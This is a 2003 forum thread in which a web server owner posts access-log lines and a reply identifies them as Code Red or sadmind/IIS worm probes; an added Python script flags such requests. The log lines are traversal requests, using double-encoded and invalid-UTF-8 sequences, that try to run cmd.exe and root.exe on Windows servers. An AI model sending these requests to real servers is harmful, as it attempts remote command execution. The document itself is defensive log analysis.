Help needed on explanation log-file

Butch Glaser
Posted: Fri Dec 26, 2003 9:20 pm    Post subject: Help needed on explanation log-file

Hello,

I installed the Abyss web server a couple of days ago and it seems to work OK.
I checked the log file and found the entries below.

Can somebody explain these entries in the log file and, moreover, tell me if somebody successfully broke into my system?

Thanks for a response.

Butch Slager

Part from log file>>>>>>>>>>
62.141.249.232 - - [26/Dec/2003:01:10:39 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:40 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:41 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:41 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:41 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:42 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:42 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:43 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:48 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:53 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:57 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
<<<<<<<<<<<<<End of logfile.
Axis
Posted: Fri Dec 26, 2003 10:59 pm

Hi Butch--

Those are the footprints of either the Code Red virus or the sadmind/IIS virus. An infected machine visited your site. You are using Abyss, so you are not vulnerable to these viruses (they have been around for some time...even most FrontPage sites are now patched for this.)

It is incredible how long some people will go with a virus-infected machine before they figure it out.

Regards,
Axis
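Added example, not part of the original thread: a Python triage of access-log lines like the ones posted above, flagging requests that carry these probe patterns and separating those the server refused from any it answered with a 2xx status. The function names, reason labels and the two 192.0.2.x log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Three lines copied from the log in the post, plus two constructed lines
# (192.0.2.x addresses): a normal page view and a probe answered with 200.
SAMPLE = '''\
62.141.249.232 - - [26/Dec/2003:01:10:39 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:41 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:53 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
192.0.2.7 - - [26/Dec/2003:09:00:00 +0100] "GET /index.html HTTP/1.0" 200 1024 "" ""
192.0.2.9 - - [26/Dec/2003:09:05:00 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 512 "" ""
'''

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# C0/C1 lead bytes are never valid UTF-8; the logged requests use them around "..".
BAD_UTF8 = re.compile(r'%c[01]%[0-9a-f]{2}')
TARGETS = ('cmd.exe', 'root.exe')

def classify(path):
    """Return the reasons a request path looks like one of these probes."""
    low = path.lower()
    reasons = []
    if any(t in low.split('?')[0] for t in TARGETS):
        reasons.append('shell-binary')
    if '%25' in low:
        reasons.append('double-encoding')
    if BAD_UTF8.search(low):
        reasons.append('invalid-utf8')
    # Decode twice so %255c -> %5c -> "\", then treat "\" like "/".
    if '../' in unquote(unquote(low)).replace('\\', '/'):
        reasons.append('traversal')
    return reasons

def triage(log_text):
    """Split flagged requests into (rejected, served) by HTTP status."""
    rejected, served = [], []
    for line in log_text.splitlines():
        m = LINE.match(line)
        reasons = classify(m['path']) if m else []
        if reasons:
            hit = (m['ip'], m['path'], int(m['status']), reasons)
            (served if 200 <= hit[2] < 300 else rejected).append(hit)
    return rejected, served

if __name__ == '__main__':
    rejected, served = triage(SAMPLE)
    print(f'{len(rejected)} probes rejected, {len(served)} answered with 2xx')
    for ip, path, status, reasons in served:
        print('INVESTIGATE', ip, status, path, reasons)
```

Every flagged line in the posted log carries a 404 or 400 status, so all of them land in the rejected list; a flagged request in the served list is the case that needs a closer look.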
Butch Glaser
Posted: Fri Dec 26, 2003 11:40 pm

Hello Axis,

Thanks for your response.
Good to know that nobody successfully broke into my system.

regards,

Butch Slager
All times are GMT + 1 Hour